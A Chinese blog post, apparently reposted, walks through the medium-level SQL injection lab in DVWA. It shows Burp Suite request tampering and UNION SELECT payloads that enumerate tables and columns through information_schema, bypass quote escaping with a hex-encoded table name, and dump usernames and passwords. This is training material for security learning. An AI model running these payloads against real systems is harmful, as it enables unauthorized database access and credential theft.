码迷,mamicode.com
首页 > 数据库 > 详细

dvwa闯关——medium级SQL

时间:2020-01-05 09:51:22      阅读:86      评论:0      收藏:0      [点我收藏+]

标签:tables   mamicode   color   com   取数   修改   存在   ati   use   

medium级的sql不让用户输入,可以通过burpsuite抓包绕过

一、判断是否有注入点,注入类型、字段数等

  1.是否有注入即注入类型

  技术图片

 

 

   技术图片

  修改为id=1 and 1=1后,如下图:

 

 

 

   技术图片

 

 

   存在注入点为数字型

  2.判断字段数

  1 order by 2时:

  技术图片

  技术图片

   1 order by 3时:

 

 

   技术图片

  技术图片

 

 

   所以字段数为2

  3.确定回显位置

   技术图片

 

 

   技术图片

 

 

   4.查询数据库及版本

  技术图片

 

 

   技术图片

 

 

   5.获取数据库中所有表

  1 union select 1,table_name from information_schema.tables where table_schema=database()

  技术图片

 

   该数据库有两张表

  技术图片

 

   6.获取列名

  单引号被转义了,所以不能用table_name=‘users‘获取数据,用十六进制绕过

  1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273

  技术图片

  列名

  技术图片

 

   7.获取用户和密码

  1 union select user,password form users

  技术图片

  用户和密码

  技术图片

 

 

  

dvwa闯关——medium级SQL

标签:tables   mamicode   color   com   取数   修改   存在   ati   use   

原文地址:https://www.cnblogs.com/walkwaters/p/12151190.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!